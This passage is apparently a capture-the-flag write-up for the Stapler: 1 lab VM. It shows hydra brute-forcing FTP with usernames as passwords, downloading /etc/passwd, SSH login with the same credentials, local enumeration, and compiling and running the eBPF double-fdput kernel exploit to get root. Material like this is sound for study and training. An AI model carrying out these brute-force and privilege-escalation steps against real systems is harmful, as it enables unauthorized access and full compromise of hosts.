> 226 Transfer complete.
> 107 bytes received in 0.00 secs (49.0343 kB/s)
> ftp> exit
> 221 Goodbye.

I will laugh if they store a username and password directly in this file.

> $ cat note
> Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John

Seems like Elly has some "payload information" stored in her FTP account.
Since we REALLY want to gain access to Elly's FTP account, let's try to brute force using the list we got earlier, with the same list doubling as the password list:

> hydra -L users.txt -P users.txt 192.168.117.136 ftp
> host: 192.168.117.136 login: SHayslett password: SHayslett

OMG seriously? There really is a credential that works this way.

> username: SHayslett
> password: SHayslett

(Using users.txt as both lists tries every user against every name, 30 x 30 attempts. hydra's -e s option tests each login with its own name as the password, and -e ns adds the empty password as well, so `hydra -L users.txt -e ns 192.168.117.136 ftp` finds the same hit in a fraction of the attempts and is far less noisy against a service with lockouts.)

Let's connect using FTP:

> root@kali:/tmp/stapler1# ftp 192.168.117.136
> Connected to 192.168.117.136.
> 220-
> 220-|-----------------------------------------------------------------------------------------|
> 220-| Harry, make sure to update the banner when you get a chance to show who has access here |
> 220-|-----------------------------------------------------------------------------------------|
> 220-
> 220
> Name (192.168.117.136:root): SHayslett
> 331 Please specify the password.
> Password:
> 230 Login successful.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> ls
> 200 PORT command successful. Consider using PASV.
> 150 Here comes the directory listing.
> drwxr-xr-x    5 0        0            4096 Jun 03  2016 X11
> drwxr-xr-x    3 0        0            4096 Jun 03  2016 acpi
> -rw-r--r--    1 0        0            3028 Apr 20  2016 adduser.conf
> -rw-r--r--    1 0        0              51 Jun 03  2016 aliases
> -rw-r--r--    1 0        0           12288 Jun 03  2016 aliases.db
> drwxr-xr-x    2 0        0            4096 Jun 07  2016 alternatives
> drwxr-xr-x    8 0        0            4096 Jun 03  2016 apache2
> drwxr-xr-x    3 0        0            4096 Jun 03  2016 apparmor
> drwxr-xr-x    9 0        0            4096 Jun 06  2016 apparmor.d
> drwxr-xr-x    3 0        0            4096 Jun 03  2016 apport
> drwxr-xr-x    6 0        0            4096 Jun 03  2016 apt
> -rw-r-----    1 0        1             144 Jan 14  2016 at.deny
> drwxr-xr-x    5 0        0            4096 Jun 03  2016 authbind
> -rw-r--r--    1 0        0            2188 Aug 31  2015 bash.bashrc
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 bash_completion.d
> -rw-r--r--    1 0        0             367 Jan 27  2016 bindresvport.blacklist
> drwxr-xr-x    2 0        0            4096 Apr 12  2016 binfmt.d
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 byobu
> drwxr-xr-x    3 0        0            4096 Jun 03  2016 ca-certificates
> -rw-r--r--    1 0        0            7788 Jun 03  2016 ca-certificates.conf
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 console-setup
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 cron.d
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 cron.daily
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 cron.hourly
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 cron.monthly
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 cron.weekly
> -rw-r--r--    1 0        0             722 Apr 05  2016 crontab
> -rw-r--r--    1 0        0              54 Jun 03  2016 crypttab
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 dbconfig-common
> drwxr-xr-x    4 0        0            4096 Jun 03  2016 dbus-1
> -rw-r--r--    1 0        0            2969 Nov 10  2015 debconf.conf
> -rw-r--r--    1 0        0              12 Apr 30  2015 debian_version
> drwxr-xr-x    3 0        0            4096 Jun 05  2016 default
> -rw-r--r--    1 0        0             604 Jul 02  2015 deluser.conf
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 depmod.d
> drwxr-xr-x    4 0        0            4096 Jun 03  2016 dhcp
> -rw-r--r--    1 0        0           26716 Jul 30  2015 dnsmasq.conf
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 dnsmasq.d
> drwxr-xr-x    4 0        0            4096 Jun 07  2016 dpkg
> -rw-r--r--    1 0        0              96 Apr 20  2016 environment
> drwxr-xr-x    4 0        0            4096 Jun 03  2016 fonts
> -rw-r--r--    1 0        0             594 Jun 03  2016 fstab
> -rw-r--r--    1 0        0             132 Feb 10  2016 ftpusers
> -rw-r--r--    1 0        0             280 Jun 20  2014 fuse.conf
> -rw-r--r--    1 0        0            2584 Feb 18  2016 gai.conf
> -rw-rw-r--    1 0        0            1253 Jun 04  2016 group
> -rw-------    1 0        0            1240 Jun 03  2016 group-
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 grub.d
> -rw-r-----    1 0        42           1004 Jun 04  2016 gshadow
> -rw-------    1 0        0             995 Jun 03  2016 gshadow-
> drwxr-xr-x    3 0        0            4096 Jun 03  2016 gss
> -rw-r--r--    1 0        0              92 Oct 22  2015 host.conf
> -rw-r--r--    1 0        0              12 Jun 03  2016 hostname
> -rw-r--r--    1 0        0             469 Jun 05  2016 hosts
> -rw-r--r--    1 0        0             411 Jun 03  2016 hosts.allow
> -rw-r--r--    1 0        0             711 Jun 03  2016 hosts.deny
> -rw-r--r--    1 0        0            1257 Jun 03  2016 inetd.conf
> drwxr-xr-x    2 0        0            4096 Feb 06  2016 inetd.d
> drwxr-xr-x    2 0        0            4096 Jun 06  2016 init
> drwxr-xr-x    2 0        0            4096 Jun 06  2016 init.d
> drwxr-xr-x    5 0        0            4096 Jun 03  2016 initramfs-tools
> -rw-r--r--    1 0        0            1748 Feb 04  2016 inputrc
> drwxr-xr-x    3 0        0            4096 Jun 03  2016 insserv
> -rw-r--r--    1 0        0             771 Mar 06  2015 insserv.conf
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 insserv.conf.d
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 iproute2
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 iptables
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 iscsi
> -rw-r--r--    1 0        0             345 Dec 17 15:27 issue
> -rw-r--r--    1 0        0             197 Jun 03  2016 issue.net
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 kbd
> drwxr-xr-x    5 0        0            4096 Jun 03  2016 kernel
> -rw-r--r--    1 0        0             144 Jun 03  2016 kernel-img.conf
> -rw-r--r--    1 0        0           26754 Jun 07  2016 ld.so.cache
> -rw-r--r--    1 0        0              34 Jan 27  2016 ld.so.conf
> drwxr-xr-x    2 0        0            4096 Jun 07  2016 ld.so.conf.d
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 ldap
> -rw-r--r--    1 0        0             267 Oct 22  2015 legal
> -rw-r--r--    1 0        0             191 Jan 18  2016 libaudit.conf
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 libnl-3
> drwxr-xr-x    4 0        0            4096 Jun 06  2016 lighttpd
> -rw-r--r--    1 0        0            2995 Apr 14  2016 locale.alias
> -rw-r--r--    1 0        0            9149 Jun 03  2016 locale.gen
> -rw-r--r--    1 0        0            3687 Jun 03  2016 localtime
> drwxr-xr-x    6 0        0            4096 Jun 03  2016 logcheck
> -rw-r--r--    1 0        0           10551 Mar 29  2016 login.defs
> -rw-r--r--    1 0        0             703 May 06  2015 logrotate.conf
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 logrotate.d
> -rw-r--r--    1 0        0             103 Apr 12  2016 lsb-release
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 lvm
> -r--r--r--    1 0        0              33 Jun 03  2016 machine-id
> -rw-r--r--    1 0        0             111 Nov 20  2015 magic
> -rw-r--r--    1 0        0             111 Nov 20  2015 magic.mime
> -rw-r--r--    1 0        0            2579 Jun 03  2016 mailcap
> -rw-r--r--    1 0        0             449 Oct 30  2015 mailcap.order
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 mdadm
> -rw-r--r--    1 0        0           24241 Oct 30  2015 mime.types
> -rw-r--r--    1 0        0             967 Oct 30  2015 mke2fs.conf
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 modprobe.d
> -rw-r--r--    1 0        0             195 Apr 20  2016 modules
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 modules-load.d
> lrwxrwxrwx    1 0        0              19 Jun 03  2016 mtab -> ../proc/self/mounts
> drwxr-xr-x    4 0        0            4096 Jun 06  2016 mysql
> drwxr-xr-x    7 0        0            4096 Jun 03  2016 network
> -rw-r--r--    1 0        0              91 Oct 22  2015 networks
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 newt
> -rw-r--r--    1 0        0             497 May 04  2014 nsswitch.conf
> drwxr-xr-x    2 0        0            4096 Apr 20  2016 opt
> lrwxrwxrwx    1 0        0              21 Jun 03  2016 os-release -> ../usr/lib/os-release
> -rw-r--r--    1 0        0            6595 Jun 23  2015 overlayroot.conf
> -rw-r--r--    1 0        0             552 Mar 16  2016 pam.conf
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 pam.d
> -rw-r--r--    1 0        0            2908 Jun 04  2016 passwd
> -rw-------    1 0        0            2869 Jun 03  2016 passwd-
> drwxr-xr-x    4 0        0            4096 Jun 03  2016 perl
> drwxr-xr-x    3 0        0            4096 Jun 03  2016 php
> drwxr-xr-x    3 0        0            4096 Jun 06  2016 phpmyadmin
> drwxr-xr-x    3 0        0            4096 Jun 03  2016 pm
> drwxr-xr-x    5 0        0            4096 Jun 03  2016 polkit-1
> drwxr-xr-x    3 0        0            4096 Jun 03  2016 postfix
> drwxr-xr-x    4 0        0            4096 Jun 03  2016 ppp
> -rw-r--r--    1 0        0             575 Oct 22  2015 profile
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 profile.d
> -rw-r--r--    1 0        0            2932 Oct 25  2014 protocols
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 python
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 python2.7
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 python3
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 python3.5
> -rwxr-xr-x    1 0        0             472 Jun 06  2016 rc.local
> drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc0.d
> drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc1.d
> drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc2.d
> drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc3.d
> drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc4.d
> drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc5.d
> drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc6.d
> drwxr-xr-x    2 0        0            4096 Jun 06  2016 rcS.d
> -rw-r--r--    1 0        0              63 Dec 17 17:34 resolv.conf
> drwxr-xr-x    5 0        0            4096 Jun 06  2016 resolvconf
> -rwxr-xr-x    1 0        0             268 Nov 10  2015 rmt
> -rw-r--r--    1 0        0             887 Oct 25  2014 rpc
> -rw-r--r--    1 0        0            1371 Jan 27  2016 rsyslog.conf
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 rsyslog.d
> drwxr-xr-x    3 0        0            4096 Dec 17 15:27 samba
> -rw-r--r--    1 0        0            3663 Jun 09  2015 screenrc
> -rw-r--r--    1 0        0            4038 Mar 29  2016 securetty
> drwxr-xr-x    4 0        0            4096 Jun 03  2016 security
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 selinux
> -rw-r--r--    1 0        0           19605 Oct 25  2014 services
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 sgml
> -rw-r-----    1 0        42           4518 Jun 05  2016 shadow
> -rw-------    1 0        0            1873 Jun 03  2016 shadow-
> -rw-r--r--    1 0        0             125 Jun 03  2016 shells
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 skel
> -rw-r--r--    1 0        0             100 Nov 25  2015 sos.conf
> drwxr-xr-x    2 0        0            4096 Jun 04  2016 ssh
> drwxr-xr-x    4 0        0            4096 Jun 03  2016 ssl
> -rw-r--r--    1 0        0             644 Jun 04  2016 subgid
> -rw-------    1 0        0             625 Jun 03  2016 subgid-
> -rw-r--r--    1 0        0             644 Jun 04  2016 subuid
> -rw-------    1 0        0             625 Jun 03  2016 subuid-
> -r--r-----    1 0        0             769 Jun 05  2016 sudoers
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 sudoers.d
> -rw-r--r--    1 0        0            2227 Jun 03  2016 sysctl.conf
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 sysctl.d
> drwxr-xr-x    5 0        0            4096 Jun 03  2016 systemd
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 terminfo
> -rw-r--r--    1 0        0              14 Jun 03  2016 timezone
> drwxr-xr-x    2 0        0            4096 Apr 12  2016 tmpfiles.d
> -rw-r--r--    1 0        0            1260 Mar 16  2016 ucf.conf
> drwxr-xr-x    4 0        0            4096 Jun 03  2016 udev
> drwxr-xr-x    3 0        0            4096 Jun 03  2016 ufw
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 update-motd.d
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 update-notifier
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 vim
> drwxr-xr-x    3 0        0            4096 Jun 03  2016 vmware-tools
> -rw-r--r--    1 0        0             278 Jun 03  2016 vsftpd.banner
> -rw-r--r--    1 0        0               0 Jun 03  2016 vsftpd.chroot_list
> -rw-r--r--    1 0        0            5961 Jun 04  2016 vsftpd.conf
> -rw-r--r--    1 0        0               0 Jun 03  2016 vsftpd.user_list
> lrwxrwxrwx    1 0        0              23 Jun 03  2016 vtrgb -> /etc/alternatives/vtrgb
> -rw-r--r--    1 0        0            4942 Jan 08  2016 wgetrc
> drwxr-xr-x    3 0        0            4096 Jun 03  2016 xdg
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 xml
> drwxr-xr-x    2 0        0            4096 Jun 03  2016 zsh
> 226 Directory send OK.

This is really bad. The FTP session has landed in the server's /etc directory, and every world-readable file you see above can be downloaded now, including the vsftpd.conf I was hoping to get from the SMB backup share. Keep an eye on the modes, though: passwd, group and vsftpd.conf are world-readable, but shadow and gshadow are mode 640 owned by root with group 42 (shadow), and sudoers is 440 root:root, so a session running as SHayslett should not be able to fetch those unless vsftpd itself is misconfigured. For example, the passwd file:

> ftp> get passwd

And then if you view the file, you get the following content:

> root@kali:/tmp/stapler1# cat passwd
> root:x:0:0:root:/root:/bin/zsh
> daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
> bin:x:2:2:bin:/bin:/usr/sbin/nologin
> sys:x:3:3:sys:/dev:/usr/sbin/nologin
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/usr/sbin/nologin
> man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
> lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
> mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
> news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
> uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
> proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
> www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
> backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
> list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
> irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
> gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
> systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
> systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
> systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
> systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
> syslog:x:104:108::/home/syslog:/bin/false
> _apt:x:105:65534::/nonexistent:/bin/false
> lxd:x:106:65534::/var/lib/lxd/:/bin/false
> dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
> messagebus:x:108:111::/var/run/dbus:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin > peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh > mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false > RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash > ETollefson:x:1002:1002::/home/ETollefson:/bin/bash > DSwanger:x:1003:1003::/home/DSwanger:/bin/bash > AParnell:x:1004:1004::/home/AParnell:/bin/bash > SHayslett:x:1005:1005::/home/SHayslett:/bin/bash > MBassin:x:1006:1006::/home/MBassin:/bin/bash > JBare:x:1007:1007::/home/JBare:/bin/bash > LSolum:x:1008:1008::/home/LSolum:/bin/bash > IChadwick:x:1009:1009::/home/IChadwick:/bin/false > MFrei:x:1010:1010::/home/MFrei:/bin/bash > SStroud:x:1011:1011::/home/SStroud:/bin/bash > CCeaser:x:1012:1012::/home/CCeaser:/bin/dash > JKanode:x:1013:1013::/home/JKanode:/bin/bash > CJoo:x:1014:1014::/home/CJoo:/bin/bash > Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin > LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin > JLipps:x:1017:1017::/home/JLipps:/bin/sh > jamie:x:1018:1018::/home/jamie:/bin/sh > Sam:x:1019:1019::/home/Sam:/bin/zsh > Drew:x:1020:1020::/home/Drew:/bin/bash > jess:x:1021:1021::/home/jess:/bin/bash > SHAY:x:1022:1022::/home/SHAY:/bin/bash > Taylor:x:1023:1023::/home/Taylor:/bin/sh > mel:x:1024:1024::/home/mel:/bin/bash > kai:x:1025:1025::/home/kai:/bin/sh > zoe:x:1026:1026::/home/zoe:/bin/bash > NATHAN:x:1027:1027::/home/NATHAN:/bin/bash > www:x:1028:1028::/home/www: > postfix:x:112:118::/var/spool/postfix:/bin/false > ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false > elly:x:1029:1029::/home/elly:/bin/bash This is really bad. Can I get an interactive shell using this same credentials??
GAINING LOW PRIVILEGE SHELL USING OBTAINED CREDENTIALS (THROUGH SMB ENUMERATION)
While I put the banner here, if you have been reading until this point you will already know that the steps on this path are as follows:

* Performed SMB enumeration
* Obtained a list of users and used it to create a wordlist for brute force attacks
* Used hydra to brute force the FTP service, successfully gained authenticated access and was able to download files, e.g. passwd

What if I target the SSH service instead of the FTP service in step 3? Can I gain a low privilege shell on my target machine using the following credentials?

> username: SHayslett
> password: SHayslett

Apparently, the answer is YES:

> $ ssh SHayslett@192.168.117.136
> -----------------------------------------------------------------
> ~ Barry, don't forget to put a message here ~
> -----------------------------------------------------------------
> SHayslett@192.168.117.136's password:
> Welcome back!
>
> SHayslett@red:~$ id
> uid=1005(SHayslett) gid=1005(SHayslett) groups=1005(SHayslett)

Wait. While it is entirely unnecessary, I have not looked at ports 3306 and 12380 yet. Will there be other ways to gain a foothold in the system apart from the above method? Maybe. But that is for next time, provided that I can find some other ways to gain entry (and have the time for it).

> _Update on 30 April 2018: I just posted a new write-up on a different path to gain entry into the machine using a method apart from the SMB enumeration I used in this write-up. If you're interested, make your way to Write-up for Stapler: 1 – A Different Path_
PRIVILEGE ESCALATION – LOCAL ENUMERATION

Once again, it's time to throw in our favourite enumeration scripts to look for possibilities to perform privilege escalation. Since we have SSH access, we can simply use SCP to transfer files, or use whatever other method you prefer, e.g. ftp, http, etc. Here is some of the interesting information that I have shortlisted.

First, the kernel information. This information is extremely important when performing privilege escalation.

> Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016
>
> DISTRIB_ID=Ubuntu
> DISTRIB_RELEASE=16.04
> DISTRIB_CODENAME=xenial
> DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"

Also, it seems that /home/www is world accessible (drwxrwxrwx, so anyone can write into it):

> # permissions on /home directories:
> total 128K
> drwxr-xr-x 32 root root 4.0K Jun 4 2016 .
> drwxr-xr-x 22 root root 4.0K Jun 7 2016 ..
> drwxr-xr-x 2 AParnell AParnell 4.0K Jun 5 2016 AParnell
> drwxr-xr-x 2 CCeaser CCeaser 4.0K Jun 5 2016 CCeaser
> drwxr-xr-x 2 CJoo CJoo 4.0K Jun 5 2016 CJoo
> drwxr-xr-x 2 Drew Drew 4.0K Jun 5 2016 Drew
> drwxr-xr-x 2 DSwanger DSwanger 4.0K Jun 5 2016 DSwanger
> drwxr-xr-x 2 Eeth Eeth 4.0K Jun 5 2016 Eeth
> drwxr-xr-x 2 elly elly 4.0K Jun 5 2016 elly
> drwxr-xr-x 2 ETollefson ETollefson 4.0K Jun 5 2016 ETollefson
> drwxr-xr-x 2 IChadwick IChadwick 4.0K Jun 5 2016 IChadwick
> drwxr-xr-x 2 jamie jamie 4.0K Jun 5 2016 jamie
> drwxr-xr-x 2 JBare JBare 4.0K Jun 5 2016 JBare
> drwxr-xr-x 2 jess jess 4.0K Jun 5 2016 jess
> drwxr-xr-x 2 JKanode JKanode 4.0K Jun 5 2016 JKanode
> drwxr-xr-x 2 JLipps JLipps 4.0K Jun 5 2016 JLipps
> drwxr-xr-x 2 kai kai 4.0K Jun 5 2016 kai
> drwxr-xr-x 2 LSolum LSolum 4.0K Jun 5 2016 LSolum
> drwxr-xr-x 2 LSolum2 LSolum2 4.0K Jun 5 2016 LSolum2
> drwxr-xr-x 2 MBassin MBassin 4.0K Jun 5 2016 MBassin
> drwxr-xr-x 2 mel mel 4.0K Jun 5 2016 mel
> drwxr-xr-x 2 MFrei MFrei 4.0K Jun 5 2016 MFrei
> drwxr-xr-x 2 NATHAN NATHAN 4.0K Jun 5 2016 NATHAN
> drwxr-xr-x 3 peter peter 4.0K Jun 3 2016 peter
> drwxr-xr-x 2 RNunemaker RNunemaker 4.0K Jun 5 2016 RNunemaker
> drwxr-xr-x 2 Sam Sam 4.0K Jun 5 2016 Sam
> drwxr-xr-x 2 SHAY SHAY 4.0K Jun 5 2016 SHAY
> drwxr-xr-x 3 SHayslett SHayslett 4.0K Dec 17 19:12 SHayslett
> drwxr-xr-x 2 SStroud SStroud 4.0K Jun 5 2016 SStroud
> drwxr-xr-x 2 Taylor Taylor 4.0K Jun 5 2016 Taylor
> drwxrwxrwx 2 www www 4.0K Jun 5 2016 www
> drwxr-xr-x 2 zoe zoe 4.0K Jun 5 2016 zoe

Netstat information. Interestingly, there is an SMTP server bound to localhost only (127.0.0.1:25), probably something put there specially for one to perform privilege escalation.

> Active Internet connections (servers and established)
> Proto Recv-Q Send-Q Local Address          Foreign Address        State       PID/Program name
> tcp        0      0 0.0.0.0:3306           0.0.0.0:*              LISTEN      -
> tcp        0      0 0.0.0.0:139            0.0.0.0:*              LISTEN      -
> tcp        0      0 0.0.0.0:80             0.0.0.0:*              LISTEN      -
> tcp        0      0 0.0.0.0:21             0.0.0.0:*              LISTEN      -
> tcp        0      0 0.0.0.0:53             0.0.0.0:*              LISTEN      -
> tcp        0      0 0.0.0.0:22             0.0.0.0:*              LISTEN      -
> tcp        0      0 0.0.0.0:8888           0.0.0.0:*              LISTEN      -
> tcp        0      0 127.0.0.1:25           0.0.0.0:*              LISTEN      -
> tcp        0      0 0.0.0.0:666            0.0.0.0:*              LISTEN      -
> tcp        0      0 0.0.0.0:12380          0.0.0.0:*              LISTEN      -
> tcp        0      0 0.0.0.0:445            0.0.0.0:*              LISTEN      -
> tcp        0      0 192.168.117.136:22     192.168.117.134:53878  ESTABLISHED -
> tcp6       0      0 :::139                 :::*                   LISTEN      -
> tcp6       0      0 :::53                  :::*                   LISTEN      -
> tcp6       0      0 :::22                  :::*                   LISTEN      -
> tcp6       0      0 :::445                 :::*                   LISTEN      -

I didn't know there was something listening on port 8888 though. I attempted to connect to it from outside, but it doesn't work. Even nmap shows that the port is filtered.

> $ nmap -sS -Pn -T4 -p8888 192.168.117.136
>
> Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-17 19:22 +08
> Nmap scan report for 192.168.117.136
> Host is up (0.00031s latency).
> PORT     STATE    SERVICE
> 8888/tcp filtered sun-answerbook

After checking the locally running services, I finally understood what the issue was.

> root 1430 0.0 0.3 6472 3220 ? S 15:27 0:00 su -c cd /home/JKanode; python2 -m SimpleHTTPServer 8888 &>/dev/null JKanode

Apparently, there was indeed an HTTP server set up, but anything it outputs goes to /dev/null, ouch.

Other findings from the local privilege escalation enumeration, on software version information:

> Sudo version:
> Sudo version 1.8.16
>
> MySQL version:
> mysql Ver 14.14 Distrib 5.7.12, for Linux (i686) using EditLine wrapper
>
> Apache version:
> Server version: Apache/2.4.18 (Ubuntu)
> Server built: 2016-04-15T18:00:57

The author has been very nice to leave all these tools in the box:

> /bin/nc
> /bin/netcat
> /usr/bin/wget
> /usr/bin/gcc
That's it for now. Is there anything you noticed that can help us gain root access already?

PRIVILEGE ESCALATION USING KERNEL EXPLOIT

One of the easier ways to escalate privileges is to run an existing kernel exploit. Sometimes it can be a pain to make it work, but if you understand the underlying issue and what the exploit is trying to do, you can usually make it work.

> $ searchsploit '4.4.0-21'
>
> ---------------------------------------------------------------------- ----------------------------------
>  Exploit Title                                                        |  Path (/usr/share/exploitdb/)
> ---------------------------------------------------------------------- ----------------------------------
> Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Ou | exploits/lin_x86-64/local/40049.c
> ---------------------------------------------------------------------- ----------------------------------

This is not going to work because our target machine runs on 32-bit while the exploit is for 64-bit machines. What 32-bit, you ask? Here's a reminder:

> $ uname -a
>
> Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

Another way is to search for the Ubuntu version, 16.04.

> $ searchsploit '16.04'
>
> ---------------------------------------------------------------------- ----------------------------------
>  Exploit Title                                                        |  Path (/usr/share/exploitdb/)
> ---------------------------------------------------------------------- ----------------------------------
> Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution      | exploits/linux/local/40937.txt
> Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation         | exploits/linux/local/40054.c
> Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome | exploits/linux/local/40943.txt
> LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalati | exploits/linux/local/41923.txt
> Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fed | exploits/lin_x86-64/local/42275.c
> Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/ | exploits/lin_x86/local/42276.c
> Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | exploits/linux/dos/39773.txt
> Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (M | exploits/linux/local/40759.rb
> Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Con | exploits/lin_x86-64/local/40871.c
> Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Ou | exploits/lin_x86-64/local/40049.c
> Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOA | exploits/linux/local/39772.txt
> Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Pri | exploits/linux/local/40489.txt
> censura 1.16.04 - Blind SQL Injection / Cross-Site Scripting          | exploits/php/webapps/9129.txt
> ---------------------------------------------------------------------- ----------------------------------

After reading the descriptions of a few of the exploits, I selected the double-fdput exploit, ID 39772. The following is its description:

https://gist.github.com/kongwenbin/42f193df5c97b543356a253a3fc112a7

The URLs in the file that lead to the POC files all give a 404 error. However, something I learnt from my OSCP journey is to look for information online using a magical tool called a "SEARCH ENGINE", or as some call it, "Google". I managed to find the original exploit file on chromium:

Now let's transfer it to the target machine using SCP. It's very convenient since I have SSH credentials.

> scp exploit.tar SHayslett@192.168.117.136:/tmp/
> -----------------------------------------------------------------
> ~ Barry, don't forget to put a message here ~
> -----------------------------------------------------------------
> SHayslett@192.168.117.136's password:
> exploit.tar 100% 20KB 4.9MB/s 00:00

Now that I have the file on the target machine, it is time to compile the exploit!

> tar xvf exploit.tar
> ebpf_mapfd_doubleput_exploit/
> ebpf_mapfd_doubleput_exploit/hello.c
> ebpf_mapfd_doubleput_exploit/suidhelper.c
> ebpf_mapfd_doubleput_exploit/compile.sh
> ebpf_mapfd_doubleput_exploit/doubleput.c
> SHayslett@red:/tmp$ cd ebpf_mapfd_doubleput_exploit/
> SHayslett@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./compile.sh
> doubleput.c: In function 'make_setuid':
> doubleput.c:91:13: warning: cast from pointer to integer of different size
>   .insns = (__aligned_u64) insns,
>            ^
> doubleput.c:92:15: warning: cast from pointer to integer of different size
>   .license = (__aligned_u64)""
>              ^

And it's done. There were a few warnings, but overall it looks good! Now, run the exploit:

> SHayslett@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput
> starting writev
> woohoo, got pointer reuse
> writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
> suid file detected, launching rootshell...
> we have root privs now...
> root@red:/tmp/ebpf_mapfd_doubleput_exploit# id
> uid=0(root) gid=0(root) groups=0(root),1005(SHayslett)

There you go! I am now root. Lastly, the flag.txt:

> root@red:/root# cat flag.txt
> ~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
>                           .-'''''-.
>                           |'-----'|
>                           |-.....-|
>                           |       |
>                           |       |
>          _,._             |       |
>     __.o`   o`"-.         |       |
>  .-O o `"-.o   O )_,._    |       |
> ( o   O  o )--.-"`O   o"-.`'-----'`
>  '--------'  (   o  O    o)
>               `----------`
